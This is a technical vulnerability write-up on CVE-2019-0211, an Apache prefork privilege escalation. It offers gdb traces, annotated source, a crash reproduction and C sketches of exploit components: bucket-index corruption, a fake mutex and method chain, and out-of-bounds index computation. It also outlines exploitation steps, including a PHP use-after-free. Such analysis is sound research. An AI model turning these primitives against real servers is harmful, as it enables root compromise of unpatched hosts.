[SAFE-ID: JIWO-2024-2361]   Author: ecawen   Published: 2019-04-13   Last modified: 2019-04-13 by ecawen


0x00 Introduction

Apache HTTP Server versions 2.4.17 through 2.4.38 contain a local privilege escalation vulnerability (CVE-2019-0211): an out-of-bounds array access leads to an arbitrary function call. The bug is triggered by Apache's graceful restart (apache2ctl graceful). In a standard Linux configuration, the logrotate utility runs this command once a day at 6:25 a.m. to reset the log file handles. [Source: jiwo.org]

The vulnerability affects mod_prefork, mod_worker and mod_event. The demonstration below focuses on mod_prefork.

0x01 Vulnerability Description

In the prefork Multi-Processing Module (MPM), the main server process runs as root and manages a pool of single-threaded, low-privileged (www-data) worker processes that handle HTTP requests.

├─httpd(11666)─┬─httpd(12300)
│              ├─httpd(12301)
│              ├─httpd(12302)
│              ├─httpd(12303)
│              └─httpd(12304)

root      11666  0.0  0.3 272128 12944 ?        Ss   15:01   0:00 /usr/local/httpd//bin/httpd -k restart
www       12300  0.0  0.2 274344  9336 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12301  0.0  0.2 274344  8076 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12302  0.0  0.2 274344  9476 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12303  0.0  0.2 274344  9476 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart
www       12304  0.0  0.2 274344  8076 ?        S    15:12   0:00 /usr/local/httpd//bin/httpd -k restart

To get feedback from the worker processes, Apache maintains a shared memory (SHM) region, the scoreboard, which contains various information such as the workers' PIDs and the last request they handled.

Each worker maintains a process_score structure associated with its PID and has full read/write access to the SHM.

ap_scoreboard_image: pointer to the shared memory block

(gdb) p *ap_scoreboard_image 
$3 = {
  global = 0x7f4a9323e008, 
  parent = 0x7f4a9323e020, 
  servers = 0x55835eddea78
}
(gdb) p ap_scoreboard_image->servers[0]
$5 = (worker_score *) 0x7f4a93240820

Example of the shared memory entry associated with worker PID 12300:

(gdb) p ap_scoreboard_image->parent[0]
$6 = {
  pid = 12300,
  generation = 0,
  quiescing = 0 '\000',
  not_accepting = 0 '\000',
  connections = 0,
  write_completion = 0,
  lingering_close = 0,
  keep_alive = 0,
  suspended = 0,
  bucket = 0 <- index for all_buckets
}
(gdb) ptype *ap_scoreboard_image->parent
type = struct process_score {
    pid_t pid;
    ap_generation_t generation;
    char quiescing;
    char not_accepting;
    apr_uint32_t connections;
    apr_uint32_t write_completion;
    apr_uint32_t lingering_close;
    apr_uint32_t keep_alive;
    apr_uint32_t suspended;
    int bucket; <- index for all_buckets
}
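
Because every worker maps this scoreboard with read/write permissions, a compromised worker can simply overwrite the bucket field of its own process_score slot. A minimal, hypothetical C sketch of that write, assuming code execution inside a worker; the struct below mirrors the ptype output above rather than the real httpd headers, and slot lookup and error handling are omitted:

/* Hypothetical sketch: from inside a compromised worker, corrupt the bucket
 * index of our own scoreboard slot. The SHM is already mapped into the
 * worker, so this is a plain memory write. */
#include <stdint.h>
#include <sys/types.h>

typedef struct {
    pid_t    pid;
    int      generation;       /* ap_generation_t */
    char     quiescing;
    char     not_accepting;
    uint32_t connections;
    uint32_t write_completion;
    uint32_t lingering_close;
    uint32_t keep_alive;
    uint32_t suspended;
    int      bucket;           /* index into all_buckets, never bounds-checked */
} fake_process_score;          /* mirrors process_score from the ptype output */

/* parent_table points at ap_scoreboard_image->parent inside the mapped SHM,
 * my_slot is this worker's slot, evil_index is the attacker-chosen index. */
static void corrupt_own_bucket(volatile fake_process_score *parent_table,
                               int my_slot, int evil_index)
{
    parent_table[my_slot].bucket = evil_index;
}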

When Apache restarts gracefully (apachectl graceful), its main process kills all of the old worker processes and replaces them with new ones.

[root@bogon john]# ps -aux | grep http
root      12836  0.0  0.3 272260 13012 ?        Ss   15:35   0:00 /usr/local/httpd//bin/httpd -k start
www       15687  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15688  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15689  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15690  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
www       15691  0.0  0.1 274344  7632 ?        S    17:33   0:00 /usr/local/httpd//bin/httpd -k start
root      15904  0.0  0.0 112712   980 pts/0    S+   17:53   0:00 grep --color=auto http
[root@bogon john]# apachectl graceful
[root@bogon john]# ps -aux | grep http
root      12836  0.0  0.3 272260 13024 ?        Ss   15:35   0:00 /usr/local/httpd//bin/httpd -k start
www       15945  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15946  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15947  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15948  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
www       15949  0.0  0.1 274344  7652 ?        S    17:53   0:00 /usr/local/httpd//bin/httpd -k start
root      15951  0.0  0.0 112712   976 pts/0    S+   17:53   0:00 grep --color=auto http
(gdb) p $index = ap_scoreboard_image->parent[0]->bucket
(gdb) p all_buckets[$index]
$7 = {
  pod = 0x7f19db2c7408, 
  listeners = 0x7f19db35e9d0, 
  mutex = 0x7f19db2c7550
}
(gdb) ptype all_buckets[$index]
type = struct prefork_child_bucket {
    ap_pod_t *pod;
    ap_listen_rec *listeners;
    apr_proc_mutex_t *mutex; <--
}
(gdb) ptype apr_proc_mutex_t
apr_proc_mutex_t {
    apr_pool_t *pool;
    const apr_proc_mutex_unix_lock_methods_t *meth; <--
    int curr_locked;
    char *fname;
    ...
}
(gdb) ptype apr_proc_mutex_unix_lock_methods_t
apr_proc_mutex_unix_lock_methods_t {
    ...
    apr_status_t (*child_init)(apr_proc_mutex_t **, apr_pool_t *, const char *); <--
    ...
}

During a graceful restart, the main process uses the bucket value recorded for the old worker processes to index into the all_buckets array. Because the index is never checked, this can be abused to escalate privileges.

0x02 Root Cause Analysis

  1. The attacker first modifies bucket so that it points to a maliciously crafted prefork_child_bucket structure (in shared memory).

  2. Graceful restart

The main server process kills all of the previous workers and then calls prefork_run, which forks the new workers:

<server/mpm/prefork/prefork.c> // irrelevant parts omitted
static int prefork_run(apr_pool_t *_pconf, apr_pool_t *plog, server_rec *s)
{
    int index;
    int remaining_children_to_start;
    int i;

    ap_log_pid(pconf, ap_pid_fname);

    if (!retained->mpm->was_graceful) { // skipped here: during a graceful restart was_graceful is true
        if (ap_run_pre_mpm(s->process->pool, SB_SHARED) != OK) {
            retained->mpm->mpm_state = AP_MPMQ_STOPPING;
            return !OK;
        }
        /* fix the generation number in the global score; we just got a new,
         * cleared scoreboard
         */
        ap_scoreboard_image->global->running_generation = retained->mpm->my_generation;
    }
    ...
    if (!retained->mpm->was_graceful) {
        startup_children(remaining_children_to_start);
        remaining_children_to_start = 0;
    }
    ...
    while (!retained->mpm->restart_pending && !retained->mpm->shutdown_pending) {
        ...
        ap_wait_or_timeout(&exitwhy, &status, &pid, pconf, ap_server_conf); // get the PID of a worker that just died
        ...
        if (pid.pid != -1) {
            processed_status = ap_process_child_status(&pid, exitwhy, status);
            child_slot = ap_find_child_by_pid(&pid); // get that PID's parent slot index in the scoreboard
            ...
            /* non-fatal death... note that it's gone in the scoreboard. */
            if (child_slot >= 0) {
                (void) ap_update_child_status_from_indexes(child_slot, 0, SERVER_DEAD,
                                                           (request_rec *) NULL);
                prefork_note_child_killed(child_slot, 0, 0);
                if (processed_status == APEXIT_CHILDSICK) {
                    /* child detected a resource shortage (E[NM]FILE, ENOBUFS, etc)
                     * cut the fork rate to the minimum
                     */
                    retained->idle_spawn_rate = 1;
                }
                else if (remaining_children_to_start
                         && child_slot < ap_daemons_limit) { // if the worker's death was non-fatal
                    /* we're still doing a 1-for-1 replacement of dead
                     * children with new children
                     */
                    make_child(ap_server_conf, child_slot,
                               ap_get_scoreboard_process(child_slot)->bucket); // the dead worker's bucket is passed along (note: bucket can be modified by "unconventional means", leading to privilege escalation)
                    --remaining_children_to_start;
                }
            }
        }
    }
    return OK;
}

make_child:

static int make_child(server_rec *s, int slot, int bucket)
{
    ...
    if (!pid) {
        my_bucket = &all_buckets[bucket]; // my_bucket now points at the maliciously crafted prefork_child_bucket structure in shared memory
        ...
        child_main(slot, bucket);
    }
    ...
    return 0;
}

static void child_main(int child_num_arg, int child_bucket)
{
    ...
    status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex,
                                                   apr_proc_mutex_lockfile(my_bucket->mutex),
                                                   pchild));
    // SAFE_ACCEPT() only runs its argument if Apache listens on two or more
    // ports, which is usually the case (e.g. HTTP on 80 and HTTPS on 443)
    ...
}

APR_DECLARE(apr_status_t) apr_proc_mutex_child_init(apr_proc_mutex_t **mutex,
                                                    const char *fname,
                                                    apr_pool_t *pool)
{
    return (*mutex)->meth->child_init(mutex, pool, fname);
}

When apr_proc_mutex_child_init runs, (*mutex)->meth->child_init(mutex, pool, fname) is invoked and the malicious code is executed. Note that at this point the process is still running as root; it only drops its privileges later.
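
To make that indirection concrete, here is a hypothetical C sketch of the fake object chain an attacker would lay out in shared memory so that this call lands on a function of their choosing. The types are local stand-ins that mirror the ptype output earlier (fields that do not influence the call are elided), and evil_child_init is a placeholder for whatever gets executed as root:

#include <stddef.h>

typedef int apr_status_t_;                /* stand-in for apr_status_t */
typedef struct apr_pool_t_ apr_pool_t_;   /* opaque stand-in for apr_pool_t */

struct fake_mutex;                        /* stand-in for apr_proc_mutex_t */

typedef struct {
    /* the only field the parent actually dereferences for the call */
    apr_status_t_ (*child_init)(struct fake_mutex **, apr_pool_t_ *, const char *);
} fake_mutex_methods;                     /* stand-in for apr_proc_mutex_unix_lock_methods_t */

typedef struct fake_mutex {
    apr_pool_t_ *pool;
    const fake_mutex_methods *meth;       /* -> fake method table below */
} fake_mutex;

typedef struct {
    void       *pod;
    void       *listeners;
    fake_mutex *mutex;                    /* -> fake mutex below */
} fake_prefork_child_bucket;

/* Placeholder payload; a real exploit points child_init at an existing
 * function or gadget that is useful when run as root. */
static apr_status_t_ evil_child_init(struct fake_mutex **m, apr_pool_t_ *p,
                                     const char *fname)
{
    (void)m; (void)p; (void)fname;
    /* ... payload runs here, still with root privileges ... */
    return 0;
}

/* Chain written into SHM so that &all_buckets[bucket] overlaps evil_bucket:
 * evil_bucket.mutex -> evil_mutex.meth -> evil_meth.child_init */
static const fake_mutex_methods  evil_meth   = { evil_child_init };
static fake_mutex                evil_mutex  = { NULL, &evil_meth };
static fake_prefork_child_bucket evil_bucket = { NULL, NULL, &evil_mutex };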

0x03 Crash Caused by Maliciously Modifying the bucket Value via gdb

(gdb) 
716            child_main(slot, bucket);
(gdb) s
child_main (child_num_arg=child_num_arg@entry=0, child_bucket=child_bucket@entry=80808080) at prefork.c:380
380    {
(gdb) n
..........
432        status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex,
(gdb) s

Program received signal SIGSEGV, Segmentation fault.
0x000000000046c16b in child_main (child_num_arg=child_num_arg@entry=0, 
    child_bucket=child_bucket@entry=80808080) at prefork.c:432
432        status = SAFE_ACCEPT(apr_proc_mutex_child_init(&my_bucket->mutex,

0x04 Exploitation

Exploitation takes four steps:

  • Gain R/W access to the memory of a worker process
  • Write a fake prefork_child_bucket structure into the shared memory
  • Make all_buckets[bucket] point to that structure (see the index sketch after this list)
  • Wait for 6:25 a.m. to get the arbitrary function call
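
Step 3 boils down to choosing the right (possibly out-of-bounds) index to write into process_score.bucket. A hypothetical C sketch of that computation, assuming the address of all_buckets and the address of the fake structure inside the SHM have already been recovered in the worker (e.g. from /proc/self/maps and the httpd binary's symbols):

#include <stddef.h>
#include <stdint.h>

/* Mirrors the prefork_child_bucket layout shown earlier; only its size
 * matters for the index computation. */
typedef struct {
    void *pod;
    void *listeners;
    void *mutex;
} fake_prefork_child_bucket;

/* Value to write into process_score.bucket so that, on graceful restart,
 * the root parent's &all_buckets[idx] resolves to the fake structure.
 * fake_in_shm is assumed to be placed so that (fake_in_shm - all_buckets_addr)
 * is an exact multiple of sizeof(fake_prefork_child_bucket). */
static int bucket_index_for(uintptr_t all_buckets_addr, uintptr_t fake_in_shm)
{
    ptrdiff_t delta = (ptrdiff_t)(fake_in_shm - all_buckets_addr);
    return (int)(delta / (ptrdiff_t)sizeof(fake_prefork_child_bucket));
}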

Problem: PHP does not allow reading or writing /proc/self/mem, which prevents us from editing the shared memory in the straightforward way.

Gaining R/W access to the worker process's memory

PHP UAF 0-day

Since mod_prefork is frequently used together with mod_php, exploiting the vulnerability through PHP is a natural choice. We use a 0-day UAF in PHP 7.x (which also appears to work on PHP 5.x) to complete the exploitation; CVE-2019-6977 could be used as well.